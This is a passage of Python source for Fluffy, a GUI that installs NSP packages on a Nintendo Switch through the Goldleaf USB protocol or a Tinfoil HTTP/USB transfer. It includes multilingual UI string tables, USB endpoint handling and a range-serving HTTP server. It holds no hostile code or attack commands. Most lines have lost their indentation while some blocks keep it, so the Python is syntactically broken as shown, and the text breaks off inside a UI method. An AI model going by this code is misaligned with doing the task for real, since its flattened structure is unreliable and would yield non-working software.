12: "Bạn Đã Chọn Chuyển Bằng Wi-Fi",
13: "Xin Vui Lòng Chọn NSP",
14: "Cái NSP(s) Đã Được Chọn",
15: "Đang Chờ Yêu Cầu Kết Nối",
16: "Hủy Bỏ",
17: "Error: Goldleaf ngừng hoạt động.",
18: "Error: Tinfoil ngừng hoạt động.",
19: "Error: Network ngừng hoạt động.",
20: "Hình Tối",
21: "Sự Lựa Chọn",
22: "Ngôn Ngữ",
23: "Github",
24: "Network",
25: "Danh Sách NSP Đã Gởi Cho Bạn",
26: "Đang Chờ Chuyển NSP(s)",
27: "Đang Tải",
28: "Tốc Độ",
29: "Đang Chuyển NCA",
30: "Thông Tin",
31: "Cảm ơn bạn",
32: "Tặng Tôi",
}
BrazilianDict = {0: "Fluffy",
1: "INICIAR TRANSFERÊNCIA",
2: "IP do Switch",
3: "IP deste computador",
4: "Modo de transferência USB",
5: "Modo normal",
6: "Modo seguro",
7: "NSP atual",
8: "Instalado com sucesso",
9: "Aguardando seleção",
10: "Switch não detectado",
11: "Switch detectado",
12: "Modo de rede",
13: "Selecione o NSP",
14: "NSP(s) selecionados",
15: "Aguardando pedido de conexão",
16: "CANCELAR",
17: "Erro: Problema reportado pelo Goldleaf.",
18: "Erro: Problema reportado pelo Tinfoil.",
19: "Erro: Problema reportado pela rede.",
20: "Tema escuro",
21: "Opções",
22: "Língua",
23: "Github",
24: "Rede",
25: "Cabeçalho enviado",
26: "NSP(s) em fila",
27: "Instalando",
28: "Velocidade de transferência",
29: "NCA atual",
30: "Informação",
31: "Obrigado",
32: "Doe Para Mim",
}
ItalianDict = {0: "Fluffy",
1: "Inizia Trasferimento",
2: "IP della Switch",
3: "IP di questo Computer",
4: "Trasferimento USB",
5: "Modalità Normale",
6: "Modalità Sicura",
7: "NSP Corrente",
8: "Installazione Avvenuta con Successo",
9: "In attesa di selezione",
10: "Switch Non Rilevata",
11: "Switch Rilevata",
12: "Modalità Network",
13: "Seleziona NSP",
14: "NSP(s) Selezionato(i)",
15: "In Attesa di Richiesta di Connessione",
16: "Annulla",
17: "Errore: Goldleaf ha lanciato una eccezione.",
18: "Errore: Tinfoil ha lanciato una eccezione.",
19: "Errore: eccezione nella Modalità Network.",
20: "Dark Mode",
21: "Opzioni",
22: "Lingua",
23: "Github",
24: "Network",
25: "Headers Inviati",
26: "NSP(s) in Coda",
27: "Installazione in Corso",
28: "Velocità di Trasferimento",
29: "NCA Corrente",
30: "Informazione",
31: "Grazie",
32: "Dona A Me",
}
TurkishDict = {0: "Fluffy",
1: "Aktarmaya Başla",
2: "Switch IP 'si",
3: "Bu bilgisayarın IP 'si",
4: "USB Transfer Modu",
5: "Normal Mod",
6: "Güvenli Mod",
7: "Şu anki NSP",
8: "Başarıyla Yüklendi",
9: "Seçim Bekleniyor",
10: "Switch Algılanamadı",
11: "Switch Algılandı",
12: "Ağ Modu",
13: "NSP Seçimi",
14: "NSP(ler) Seçildi",
15: "Bağlantı İsteği Bekleniyor",
16: "İptal",
17: "Hata: Goldleaf 'te sıradışı durum oluştu.",
18: "Hata: Tinfoil 'de sıradışı durum oluştu.",
19: "Hata: Ağda sıradışı durum oluştu.",
20: "Karanlık Mod",
21: "Ayarlar",
22: "Dil",
23: "Github",
24: "Ağ",
25: "Başlık Gönderildi",
26: "Sıradaki NSP(ler)",
27: "Yükleniyor",
28: "Aktarma Hızı",
29: "Şu anki NCA",
30: "Bilgi",
31: "Teşekkür Ederim",
32: "Bağış",
}
FrenchDict = {0: "Fluffy",
1: "Démarrer le Transfert",
2: "IP de la Switch",
3: "IP de l'Ordinateur",
4: "Mode de Transfert USB",
5: "Mode Normal",
6: "Mode Sûr",
7: "NSP Actuel",
8: "Installé Avec Succès",
9: "En Attente de Sélection",
10: "Switch Non Détecté",
11: "Switch Détecté",
12: "Mode Réseau",
13: "Ajouter NSP",
14: "NSP(s) Sélectionné(s)",
15: "En Attente de la Demande de Connection",
16: "Annuler",
17: "Erreur: Goldleaf a généré une exception.",
18: "Erreur: Tinfoil a généré une exception.",
19: "Erreur: Le réseau a généré une exception.",
20: "Mode Sombre",
21: "Options",
22: "Langue",
23: "Github",
24: "Réseau",
25: "En-têtes Envoyées",
26: "NSP(s) en File d'Attente",
27: "En Cours d'Installation",
28: "Débit",
29: "NCA Actuel",
30: "À Propos",
31: "Remerciements",
32: "Faire Un Don",
}
SpanishDict = {0: "Fluffy",
1: "Iniciar la Transferencia",
2: "IP de la Switch",
3: "IP del Ordenador",
4: "Modo de Transferencia USB",
5: "Modo Normal",
6: "Modo Seguro",
7: "NSP Actual",
8: "Instalado Con Éxito",
9: "Esperando Selección",
10: "Switch No Detectada",
11: "Switch Detectada",
12: "Modo Red",
13: "Añadir NSP",
14: "NSP(s) Seleccionado(s)",
15: "Esperando la Solicitud de Conexión",
16: "Cancelar",
17: "Error: Goldleaf ha generado una excepción.",
18: "Error: Tinfoil ha generado une excepción.",
19: "Error: El red ha generado une excepción.",
20: "Modo Oscuro",
21: "Opciones",
22: "Idioma",
23: "Github",
24: "Red",
25: "Cabeceras Enviadas",
26: "NSP(s) en la Cola",
27: "Instalando",
28: "Velocidad",
29: "NCA Actual",
30: "Sobre Fluffy",
31: "Muchas Gracias",
32: "Hacer Una Donación",
}
GermanDict = {0: "Fluffy",
1: "Übertragung starten",
2: "Switch-IP-Adresse",
3: "Computer-IP-Adresse",
4: "USB-Übertragungsmodus",
5: "Normaler Modus",
6: "Sicherer Modus",
7: "Momentane NSP",
8: "Erfolgreich installiert",
9: "Warte auf Auswahl",
10: "Keine Switch erkannt",
11: "Switch erkannt",
12: "Netzwerk-Modus",
13: "NSP-Auswahl",
14: "NSP(s) ausgewählt",
15: "Warte auf Verbindung",
16: "Abbrechen",
17: "Goldleaf-Fehler!",
18: "Tinfoil-Fehler!",
19: "Netzwerk-Fehler!",
20: "Dunkles Design",
21: "Einstellungen",
22: "Sprache",
23: "GitHub",
24: "Netzwerk",
25: "Header gesendet",
26: "NSP(s) in Warteschlange",
27: "Installiere",
28: "Transferrate",
29: "Aktuelle NCA",
30: "Über",
31: "Besonderer Dank",
32: "Spenden",
}
IndonesiaDict = {0: "Fluffy",
1: "Memulai Transfer",
2: "Ganti IP",
3: "IP Komputer Ini",
4: "Mode Transfer melalui USB",
5: "Mode Normal",
6: "Mode Aman",
7: "NSP Saat Ini",
8: "Penerapaan Berhasil",
9: "Menunggu Pilihan",
10: "Switch tidak terdeteksi",
11: "Switch terdeteksi",
12: "Mode Jaringan",
13: "Pemilihan NSP",
14: "NSP(s) Terpilih",
15: "Menunggu Request Koneksi",
16: "Batal",
17: "Error: Goldleaf Melemparkan Pengecualian.",
18: "Error: Tinfoil Melemparkan Pengecualian.",
19: "Error: Jaringan Melemparkan Pengecualian.",
20: "Mode Gelap",
21: "Opsi",
22: "Bahasa",
23: "Github",
24: "Jaringan",
25: "Headers Terkirim",
26: "NSP dalam Antrian",
27: "Menerapkan",
28: "Kecepatan Transfer",
29: "NCA Saat Ini",
30: "Tentang",
31: "Terima Kasih",
32: "Donasi Untukku",
}
KoreanDict = {0: "Fluffy",
1: "전송 시작",
2: "스위치 IP",
3: "이 컴퓨터의 IP",
4: "USB 전송 모드",
5: "일반 모드",
6: "안전 모드",
7: "현재 NSP",
8: "성공적으로 설치되었습니다",
9: "선택을 기다리고 있습니다",
10: "스위치가 감지되지 않았습니다",
11: "스위치가 감지되었습니다",
12: "네트워크 모드",
13: "NSP 선택",
14: "선택된 NSP",
15: "연결 요청 대기 중",
16: "취소",
17: "오류: Goldleaf에서 예외가 발생했습니다.",
18: "오류: Tinfoil에서 예외가 발생했습니다.",
19: "오류: 네트워크에서 예외가 발생했습니다.",
20: "어두운 모드",
21: "옵션",
22: "언어",
23: "Github",
24: "네트워크",
25: "헤더 보내기",
26: "대기열의 NSP",
27: "설치",
28: "전송율",
29: "현재 NCA",
30: "소개",
31: "특별 감사",
32: "기부",
}
set_language(language)
# End Language
# Setters
def _apply_inlay_pixmaps(pixmap, gold_res, about_res):
    # Scale the artwork down on smaller screens so the window still fits;
    # the breakpoints and target sizes mirror the original per-resolution cases.
    width = app.primaryScreen().size().width()
    if width <= 1366:
        sizes = ((230, 200), (230, 200), (270, 270))
    elif width <= 1920:
        sizes = ((270, 270), (270, 270), (270, 270))
    elif width <= 2560:
        sizes = ((350, 240), (270, 270), (270, 270))
    else:
        # Large screens get the artwork unscaled.
        img_label.setPixmap(pixmap)
        gold_img_label.setPixmap(gold_res)
        about_img_label.setPixmap(about_res)
        return
    img_label.setPixmap(pixmap.scaled(*sizes[0], Qt.KeepAspectRatio, Qt.SmoothTransformation))
    gold_img_label.setPixmap(gold_res.scaled(*sizes[1], Qt.KeepAspectRatio, Qt.SmoothTransformation))
    about_img_label.setPixmap(about_res.scaled(*sizes[2], Qt.KeepAspectRatio, Qt.SmoothTransformation))
def set_dark_mode(v):
    global dark_mode
    if v == 1:
        import qdarkstyle
        app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
        dark_mode = 1
        l_github.setStyleSheet("QLabel { color: rgba(255, 255, 255, 50%) }")
        _apply_inlay_pixmaps(QPixmap(dinlaypixmap), QPixmap(goldpixmap), QPixmap(aboutpixmap))
    else:
        dark_mode = 0
        app.setStyleSheet("")
        l_github.setStyleSheet("QLabel { color: rgba(0, 0, 0, 50%) }")
        _apply_inlay_pixmaps(QPixmap(inlaypixmap), QPixmap(goldpixmap), QPixmap(aboutpixmap))
def turn_off_logging():
global is_logging
is_logging = False
def set_nca_name(v):
global cur_nca_name
cur_nca_name = v
def set_start_time():
global start_time
start_time = time.time()
def set_canceled(x):
global task_canceled
task_canceled = x
def set_cur_transfer_rate(v):
global cur_transfer_rate
cur_transfer_rate = v
def set_sent_header():
global sent_header
sent_header = True
def set_last_transfer_rate(v):
global last_transfer_rate
last_transfer_rate = v
def detach_switch():
global global_dev
global global_out
global global_in
try:
usb.util.dispose_resources(global_dev)
global_dev.reset()
except:
pass
global_in = None
global_out = None
global_dev = None
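# Find the Switch over USB (Nintendo vendor id 0x057E, product id 0x3000) and
# cache its bulk OUT/IN endpoints in the module-level globals used by the
# Tinfoil and Goldleaf backends.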
def connect_switch():
global global_dev
global global_out
global global_in
global_dev = usb.core.find(idVendor=0x057E, idProduct=0x3000)
if global_dev is not None:
try:
global_dev.set_configuration()
intf = global_dev.get_active_configuration()[(0,0)]
global_out = usb.util.find_descriptor(intf,custom_match=lambda e:usb.util.endpoint_direction(e.bEndpointAddress)==usb.util.ENDPOINT_OUT)
global_in = usb.util.find_descriptor(intf,custom_match=lambda e:usb.util.endpoint_direction(e.bEndpointAddress)==usb.util.ENDPOINT_IN)
return True
        except:
            return False
    else:
        return False
def save_config():
try:
configp = configparser.ConfigParser()
configp['DEFAULT'] = {'switch_ip': switch_ip,
'language': language,
'dark_mode': dark_mode,
'allow_access_non_nsp': allow_access_non_nsp,
'ignore_warning_prompt': ignore_warning_prompt}
with open(initial_dir + 'fluffy.conf', 'w') as cfgfile:
configp.write(cfgfile)
except:
pass
def set_transfer_rate(v):
global transfer_rate
transfer_rate = TransferRateDict[v]
def get_response_qmessage(e):
global needresponse
global qrespnum
needresponse = True
qrespnum = e
def set_response_qmessage(x):
global qresponse
global haveresponse
haveresponse = True
qresponse = x
def reset_response():
global needresponse
global qresponse
global haveresponse
needresponse = False
qresponse = False
haveresponse = False
def set_dir(d):
global selected_dir
selected_dir = d
def set_selected_files(f):
global selected_files
selected_files = f
def set_progress(c, e):
global cur_progress
global end_progress
end_progress = e
cur_progress = c
def set_cur_nsp(nsp):
global cur_nsp_name
global cur_nsp_count
if cur_nsp_name != nsp:
if cur_nsp_name == "NA":
cur_nsp_name = nsp
else:
cur_nsp_count += 1
cur_nsp_name = nsp
set_start_time()
def cancel_task():
set_canceled(True)
reset_install()
def set_total_nsp(n):
global total_nsp
total_nsp = n
def complete_install():
global is_done
is_done = True
def complete_goldleaf_transfer():
global is_installing
is_installing = False
def reset_install():
global is_installing
global sent_header
global is_done
global cur_progress
global end_progress
global cur_nsp_name
global cur_transfer_rate
global last_transfer_rate
global selected_files
global selected_dir
global total_nsp
global cur_nsp_count
list_nsp.clear()
btn_header.setEnabled(True)
btn_nsp.setEnabled(True)
combo.setEnabled(True)
txt_ip.setEnabled(True)
txt_ip2.setEnabled(True)
net_radio.setEnabled(True)
usb_radio.setEnabled(True)
txt_port.setEnabled(True)
tin_radio.setEnabled(True)
gold_radio.setEnabled(True)
l_nsp.setText("")
l_nsp.setStyleSheet("")
l_switch.setText("")
l_switch.setStyleSheet("")
l_status.setStyleSheet("")
if is_goldleaf:
l_status.setText('')
progressbar.setValue(0)
cur_nsp_count = 1
total_nsp = 0
selected_files = None
selected_dir = None
cur_nsp_name = "NA"
cur_transfer_rate = 0
last_transfer_rate = 0
is_done = False
is_installing = False
sent_header = False
cur_progress = 0
end_progress = 100
UI.init_language()
window.menuBar().setEnabled(True)
if is_network:
UI.net_radio_cmd()
else:
UI.usb_radio_cmd()
def throw_error(_type):
global last_error
if _type == 0:
last_error = Language.CurrentDict[17] # Goldleaf
elif _type == 1:
last_error = Language.CurrentDict[19] # Network
elif _type == 2:
last_error = Language.CurrentDict[18] # Tinfoil
def reset_last_error():
global last_error
last_error = "NA"
def complete_loading():
global is_installing
is_installing = True
def set_network(v):
global is_network
is_network = v
def set_ip(v, n):
global switch_ip
global host_ip
if n == 0:
switch_ip = v
else:
host_ip = v
def set_goldleaf(v):
global is_goldleaf
is_goldleaf = v
def set_usb_success(v):
global usb_success
usb_success = v
# Goldleaf
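# Goldleaf USB protocol, as implemented below: each command starts with the
# 4-byte magic b"GLUC" followed by a little-endian u32 command id; strings
# travel as a u32 length followed by the raw bytes. Write-type commands
# (FileWrite, Create*/Delete*/Rename*) are gated behind a user prompt via
# get_response_qmessage(), and fw_status caches the accept/deny for FileWrite.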
class GoldleafCommandId:
ListSystemDrives = 0
GetEnvironmentPaths = 1
GetPathType = 2
ListDirectories = 3
ListFiles = 4
GetFileSize = 5
FileRead = 6
FileWrite = 7
CreateFile = 8
CreateDirectory = 9
DeleteFile = 10
DeleteDirectory = 11
RenameFile = 12
RenameDirectory = 13
GetDriveTotalSpace = 14
GetDriveFreeSpace = 15
GetNSPContents = 16
Max = 17
class GoldleafCommandReadResult:
Success = 0
InvalidMagic = 1
InvalidGoldleafCommandId = 2
class Goldleaf:
GLUC = b"GLUC"
magic = b"GLUC"
cmd_id = 0
drives = {}
FW_DENIED = 0
FW_ACCEPTED = 1
FW_NOSTATUS = 2
fw_status = FW_NOSTATUS
def init(self):
try:
detach_switch()
connect_switch()
self.goldleaf_usb()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
throw_error(0)
sys.exit()
def write(self,buffer):
try:
global_out.write(buffer,timeout=3000)
except:
pass
def read(self,length):
return global_in.read(length,timeout=0).tobytes()
def write_u32(self,x):
try:
global_out.write(struct.pack("<I", x))
except:
pass
def write_u64(self,x):
try:
global_out.write(struct.pack("<Q", x))
except:
pass
def write_string(self,x):
try:
self.write_u32(len(x))
self.write(x.encode())
except:
pass
def read_u32(self):
return struct.unpack("<I", self.read(4))[0]
def read_u64(self):
return struct.unpack("<Q", self.read(8))[0]
def read_string(self):
return self.read(self.read_u32() + 1)[:-1].decode()
def magic_ok(self):
return self.GLUC == self.magic
def is_id(self,a_cmd):
return a_cmd == self.cmd_id
def read_cmd(self):
try:
self.magic = self.read(4)
self.cmd_id = self.read_u32()
except:
pass
def write_cmd(self,a_cmd):
try:
self.write(self.magic)
self.write_u32(a_cmd)
except:
pass
def read_path(self):
path = self.read_string()
drive = path.split(":", 1)[0]
try:
path = path.replace(drive + ":", self.drives[drive])
except KeyError:
pass
return path
def goldleaf_usb(self):
while global_dev is not None and not task_canceled:
self.read_cmd()
if self.magic_ok():
if self.is_id(GoldleafCommandId.ListSystemDrives):
drive_labels = {}
if "win" in sys.platform[:3].lower():
import string
import ctypes
kernel32 = ctypes.windll.kernel32
bitmask = kernel32.GetLogicalDrives()
for letter in string.ascii_uppercase:
if bitmask & 1:
self.drives[letter] = letter + ":/"
label_buf = ctypes.create_unicode_buffer(1024)
kernel32.GetVolumeInformationW(
ctypes.c_wchar_p(letter + ":\\"),
label_buf,
ctypes.sizeof(label_buf),
None,
None,
None,
None,
0
)
if label_buf.value:
drive_labels[letter] = label_buf.value
bitmask >>= 1
else:
self.drives["ROOT"] = "/"
self.write_u32(len(self.drives))
for d in self.drives:
try:
self.write_string(drive_labels[d])
except KeyError:
self.write_string(d)
self.write_string(d)
elif self.is_id(GoldleafCommandId.GetEnvironmentPaths):
env_paths = {x:os.path.expanduser("~/"+x) for x in ["Desktop", "Documents"]}
for arg in sys.argv[1:]:
folder = os.path.abspath(arg)
if os.path.isfile(folder):
folder = os.path.dirname(folder)
env_paths[os.path.basename(folder)] = folder
env_paths = {x:env_paths[x] for x in env_paths if os.path.exists(env_paths[x])}
self.write_u32(len(env_paths))
for env in env_paths:
env_paths[env] = env_paths[env].replace("\\", "/")
self.write_string(env)
if env_paths[env][1:3] != ":/":
env_paths[env] = "ROOT:" + env_paths[env]
self.write_string(env_paths[env])
elif self.is_id(GoldleafCommandId.GetPathType):
ptype = 0
path = self.read_path()
if os.path.isfile(path):
ptype = 1
elif os.path.isdir(path):
ptype = 2
self.write_u32(ptype)
elif self.is_id(GoldleafCommandId.ListDirectories):
path = self.read_path()
ents = [x for x in os.listdir(path) if os.path.isdir(os.path.join(path, x))]
n_ents = []
for e in ents:
try:
test = os.listdir(os.path.join(path, e))
n_ents.append(e)
except:
pass
self.write_u32(len(n_ents))
for name in n_ents:
self.write_string(name)
elif self.is_id(GoldleafCommandId.ListFiles):
self.fw_status = self.FW_NOSTATUS
if is_installing:
complete_goldleaf_transfer()
path = self.read_path()
ents = [x for x in os.listdir(path) if os.path.isfile(os.path.join(path, x))]
if not allow_access_non_nsp:
len_nsps = 0
for f in ents:
if f.lower().endswith('.nsp'):
len_nsps = len_nsps+1
self.write_u32(len_nsps)
for name in ents:
if name.lower().endswith('.nsp'):
self.write_string(name)
else:
self.write_u32(len(ents))
for name in ents:
self.write_string(name)
elif self.is_id(GoldleafCommandId.GetFileSize):
path = self.read_path()
self.write_u64(os.path.getsize(path))
elif self.is_id(GoldleafCommandId.FileRead):
can_read = True
offset = self.read_u64()
size = self.read_u64()
path = self.read_path()
if not os.path.basename(path).lower().endswith('.nsp'):
if allow_access_non_nsp:
can_read = True
else:
can_read = False
if can_read:
with open(path, "rb") as f:
f.seek(offset)
data = f.read(size)
self.write_u64(len(data))
self.write(data)
try:
if self.fw_status != self.FW_DENIED:
complete_loading()
set_cur_nsp(str(os.path.basename(path)))
set_progress(int(offset), int(os.path.getsize(path)))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(int(offset) - last_transfer_rate)
set_last_transfer_rate(int(offset))
set_start_time()
else:
complete_goldleaf_transfer()
except:
pass
else:
logging.debug("Error: Access denied. \nReason: Goldleaf tried to access a non .NSP file(to bypass this default restriction, change \'allow_access_non_nsp\' to 1 in fluffy.conf).")
print("Error: Access denied. \nReason: Goldleaf tried to access a non .NSP file(to bypass this default restriction, change \'allow_access_non_nsp\' to 1 in fluffy.conf).")
cancel_task()
sys.exit()
elif self.is_id(GoldleafCommandId.FileWrite):
offset = self.read_u64()
size = self.read_u64()
path = self.read_path()
data = self.read(size)
can_write = False
if self.fw_status == self.FW_NOSTATUS:
get_response_qmessage(1)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
self.fw_status = self.FW_ACCEPTED
can_write = True
else:
self.fw_status = self.FW_DENIED
elif self.fw_status == self.FW_ACCEPTED:
can_write = True
if can_write:
cont = bytearray()
try:
with open(path, "rb") as f:
cont=bytearray(f.read())
except FileNotFoundError:
pass
cont[offset:offset + size] = data
with open(path, "wb") as f:
f.write(cont)
reset_response()
elif self.is_id(GoldleafCommandId.CreateFile):
path = self.read_path()
get_response_qmessage(2)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
open(path, "a").close()
reset_response()
elif self.is_id(GoldleafCommandId.CreateDirectory):
path = self.read_path()
get_response_qmessage(3)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
try:
os.mkdir(path)
                        except FileExistsError:  # was os.FileExistsError, which doesn't exist
pass
reset_response()
elif self.is_id(GoldleafCommandId.DeleteFile):
path = self.read_path()
get_response_qmessage(4)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
os.remove(path)
reset_response()
elif self.is_id(GoldleafCommandId.DeleteDirectory):
path = self.read_path()
get_response_qmessage(5)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
shutil.rmtree(path)
reset_response()
elif self.is_id(GoldleafCommandId.RenameFile):
path = self.read_path()
new_name = self.read_string()
get_response_qmessage(6)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
os.rename(path, new_name)
reset_response()
elif self.is_id(GoldleafCommandId.RenameDirectory):
path = self.read_path()
new_name = self.read_path()
get_response_qmessage(6)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
os.rename(path, new_name)
reset_response()
elif self.is_id(GoldleafCommandId.GetDriveTotalSpace):
path = self.read_path()
disk = os.statvfs(path)
                    totalBytes = float(disk.f_bsize * disk.f_blocks)
                    self.write_u64(int(totalBytes))  # was `totalspace`, an undefined name
elif self.is_id(GoldleafCommandId.GetDriveFreeSpace):
path = self.read_path()
disk = os.statvfs(path)
totalFreeSpace = float(disk.f_bsize*disk.f_bfree)
self.write_u64(int(totalFreeSpace))
sys.exit()
# Tinfoil Network
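# Tinfoil network install flow, as implemented below: Fluffy serves the chosen
# directory from a throwaway HTTP server on a random port (26490-26999),
# connects to the Switch on TCP port 2000, and sends a big-endian u32 length
# prefix followed by a newline-separated list of URLs. Tinfoil then downloads
# each NSP over HTTP using Range requests; netrlist maps the randomized fake
# names in those URLs back to the real file paths.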
netrlist = []
def reset_netrlist():
global netrlist
netrlist = None
netrlist = []
def append_netrlist(v, v2):
global netrlist
netrlist.append((v, v2))
class TinfoilNetwork:
def init(self):
reset_netrlist()
        accepted_extension = '.nsp'
hostPort = random.randint(26490,26999)
target_ip = switch_ip
hostIp = host_ip
target_path = str(selected_dir).strip()
baseUrl = hostIp + ':' + str(hostPort) + '/'
directory = target_path
file_list_payload = ''
for file in [file for file in next(os.walk(target_path))[2] if file.endswith(accepted_extension)]:
for y in selected_files:
if str(file).find(os.path.basename(y)) != -1:
n = random.randint(1,10000000)
fake_file = str(n) + ".nsp"
append_netrlist(fake_file, str(y))
file_list_payload += baseUrl + fake_file + '\n'
file_list_payloadBytes = file_list_payload.encode('ascii')
if directory and directory != '.':
os.chdir(directory)
server = TinfoilServer((host_ip, hostPort), TinfoilHTTPHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, 2000))
sock.sendall(struct.pack('!L', len(file_list_payloadBytes)) + file_list_payloadBytes)
while len(sock.recv(1)) < 1:
if task_canceled:
server.force_stop()
sys.exit()
time.sleep(0.1)
sock.close()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
server.force_stop()
throw_error(1)
sys.exit()
complete_install()
server.force_stop()
sys.exit()
class TinfoilHTTPHandler(SimpleHTTPRequestHandler):
def send_head(self):
        path = None
        for fake_name, real_path in netrlist:
            if fake_name == str(self.path)[1:]:
                path = real_path
        if path is None:
            # No advertised fake name matched this request; without this guard
            # an unknown URL would hit an unbound `path` below.
            return self.send_error(404, self.responses.get(404)[0])
        ctype = self.guess_type(path)
if os.path.isdir(path):
return SimpleHTTPRequestHandler.send_head(self)
if not os.path.exists(path):
return self.send_error(404, self.responses.get(404)[0])
f = open(path, 'rb')
fs = os.fstat(f.fileno())
size = fs[6]
start, end = 0, size - 1
        if 'Range' in self.headers:
            range_spec = self.headers.get('Range').strip().replace('bytes=', '', 1)
            start, end = range_spec.split('-')
            if start == "":
                # Suffix range "bytes=-N": serve the last N bytes.
                try:
                    end = int(end)
                except ValueError:
                    self.send_error(400, 'invalid range')
                    return None
                start = size - end
                end = size - 1
            else:
                try:
                    start = int(start)
                except ValueError:
                    self.send_error(400, 'invalid range')
                    return None
                if start >= size:
                    self.send_error(416, self.responses.get(416)[0])
                    return None
                if end == "":
                    end = size - 1
                else:
                    try:
                        end = int(end)
                    except ValueError:
                        self.send_error(400, 'invalid range')
                        return None
            start = max(start, 0)
            end = min(end, size - 1)
            self.range = (start, end)
cont_length = end - start + 1
if 'Range' in self.headers:
self.send_response(206)
else:
self.send_response(200)
self.send_header('Content-type', ctype)
self.send_header('Accept-Ranges', 'bytes')
self.send_header('Content-Range','bytes %s-%s/%s' % (start, end, size))
self.send_header('Content-Length', str(cont_length))
self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
self.end_headers()
return f
def copyfile(self, infile, outfile):
if 'Range' not in self.headers:
SimpleHTTPRequestHandler.copyfile(self, infile, outfile)
return
complete_loading()
set_cur_nsp(str(os.path.basename(infile.name)))
start, end = self.range
infile.seek(start)
bufsize = 64 * 1024 # 64KB
while True:
if task_canceled: sys.exit()
buf = infile.read(bufsize)
if not buf:
break
try:
outfile.write(buf)
try:
set_progress(int(infile.tell()), int(end))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(int(infile.tell()) - last_transfer_rate)
set_last_transfer_rate(int(infile.tell()))
set_start_time()
except:
pass
except BrokenPipeError:
pass
class TinfoilServer(TCPServer):
stopped = False
    def server_bind(self):
        # Allow quick restarts on the same port between transfers.
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.bind(self.server_address)
def serve_forever(self):
while not self.stopped:
if task_canceled: sys.exit()
self.handle_request()
sys.exit()
def force_stop(self):
self.server_close()
self.stopped = True
sys.exit()
# Tinfoil USB
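# Tinfoil-over-USB flow, as implemented below: the host sends b'TUL0', a u32
# byte length, and 8 padding bytes, then the newline-separated NSP paths.
# The Switch answers with 0x20-byte b'TUC0' command headers; CMD_ID_FILE_RANGE
# carries (size, offset, name length, name), and the host replies with a
# response header followed by the raw bytes in transfer_rate-sized chunks.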
class Tinfoil:
CMD_ID_EXIT = 0
CMD_ID_FILE_RANGE = 1
CMD_TYPE_RESPONSE = 1
def init(self):
try:
detach_switch()
connect_switch()
self.send_nsp_list()
self.poll_commands()
complete_install()
sys.exit()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
throw_error(2)
sys.exit()
def send_response_header(self, cmd_id, data_size):
global_out.write(b'TUC0')
global_out.write(struct.pack('<B', self.CMD_TYPE_RESPONSE))
global_out.write(b'\x00' * 3)
global_out.write(struct.pack('<I', cmd_id))
global_out.write(struct.pack('<Q', data_size))
global_out.write(b'\x00' * 0xC)
def file_range_cmd(self, data_size):
file_range_header = global_in.read(0x20)
range_size = struct.unpack('<Q', file_range_header[:8])[0]
range_offset = struct.unpack('<Q', file_range_header[8:16])[0]
nsp_name_len = struct.unpack('<Q', file_range_header[16:24])[0]
nsp_name = bytes(global_in.read(nsp_name_len)).decode('utf-8')
set_cur_nsp(str(os.path.basename(nsp_name)))
self.send_response_header(self.CMD_ID_FILE_RANGE, range_size)
with open(nsp_name, 'rb') as f:
complete_loading()
f.seek(range_offset)
curr_off = 0x0
end_off = range_size
read_size = transfer_rate
while curr_off < end_off:
if task_canceled: sys.exit()
if curr_off + read_size >= end_off:
read_size = end_off - curr_off
try:
set_progress(int(end_off), int(end_off))
except:
pass
buf = f.read(read_size)
global_out.write(data=buf, timeout=0)
curr_off += read_size
try:
set_progress(int(curr_off), int(end_off))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(curr_off - last_transfer_rate)
set_last_transfer_rate(curr_off)
set_start_time()
except:
pass
def poll_commands(self):
while True:
if task_canceled: sys.exit()
cmd_header = bytes(global_in.read(0x20, timeout=0))
magic = cmd_header[:4]
if magic != b'TUC0':
continue
cmd_type = struct.unpack('<B', cmd_header[4:5])[0]
cmd_id = struct.unpack('<I', cmd_header[8:12])[0]
data_size = struct.unpack('<Q', cmd_header[12:20])[0]
if cmd_id == self.CMD_ID_EXIT:
complete_install()
sys.exit()
elif cmd_id == self.CMD_ID_FILE_RANGE:
self.file_range_cmd(data_size)
    def send_nsp_list(self):
        nsp_path_list = list()
        nsp_path_list_len = 0
        for nsp_path in os.listdir(selected_dir):
            if nsp_path.endswith(".nsp"):
                for y in selected_files:
                    if str(nsp_path).find(os.path.basename(y)) != -1:
                        print(str(nsp_path))
                        full_path = selected_dir + "/" + str(nsp_path) + '\n'
                        nsp_path_list.append(full_path)
                        # Count encoded bytes (includes the trailing newline) so
                        # the announced length matches what is actually written.
                        nsp_path_list_len += len(full_path.encode('utf-8'))
        global_out.write(b'TUL0')
        global_out.write(struct.pack('<I', nsp_path_list_len))
        global_out.write(b'\x00' * 0x8)
        for nsp_path in nsp_path_list:
            global_out.write(nsp_path.encode('utf-8'))  # pyusb endpoints take bytes, not str
# UI
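# The transfer backends above run on daemon threads (started from
# UI.send_header_cmd) and publish state through module-level globals;
# the static UI methods below read those globals to refresh the widgets.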
class UI:
@staticmethod
def send_header_cmd():
if not sent_header:
set_canceled(False)
btn_header.setEnabled(False)
btn_nsp.setEnabled(False)
combo.setEnabled(False)
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
net_radio.setEnabled(False)
usb_radio.setEnabled(False)
txt_port.setEnabled(False)
tin_radio.setEnabled(False)
gold_radio.setEnabled(False)
window.menuBar().setEnabled(False)
if combo.currentText() == Language.CurrentDict[5]:
set_transfer_rate(1)
elif combo.currentText() == Language.CurrentDict[6]:
set_transfer_rate(0)
if is_network:
